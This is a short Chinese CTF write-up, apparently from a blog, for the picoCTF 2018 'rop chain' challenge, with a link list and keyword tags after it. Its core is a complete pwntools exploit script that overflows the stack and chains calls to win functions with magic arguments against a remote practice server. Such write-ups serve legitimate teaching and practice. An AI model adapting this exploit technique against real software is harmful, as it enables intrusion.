pwn | picoctf_2018_rop chain

栈溢出ret2text。

exp:

from pwn import *

context.log_level = 'debug'

p_vuln = 0x08048714
p_win1 = 0x080485CB
p_win2 = 0x080485D8
p_flag = 0x0804862B

# p = process('./PicoCTF_2018_rop_chain')
p = remote('node4.buuoj.cn', 26914)

p.recvuntil('input> ')
p.sendline(b'M'*(0x18+4) + p32(p_win1) + p32(p_win2) + p32(p_flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD))

p.interactive()

本栏目推荐文章
• 【pwn】cmcc_simplerop --rop链的构造
• 【pwn】hitcontraining_uaf --堆利用之uaf
• 【pwn】inndy_rop --ropchain的利用
• P4429 [BJOI2018] 染色
• AT_joisc2018_b 题解
• P4383 [八省联考 2018] 林克卡特树
• P6305 [eJOI2018] 循环排序
• PicoCTF_2018_buffer_overflow_2
• P9247 [集训队互测 2018] 完美的队列题解
• PicoCTF_2018_buffer_overflow_1

picoctf chain 2018 pwn roprop_chain picoctf chain 2018 picoctf chain 2018 pwn rop_chain inndy_rop ropchain inndy pwn 笔记hijack pwn rop picoctf buffer_overflow overflow picoctf buffer rop baby_rop inndy_rop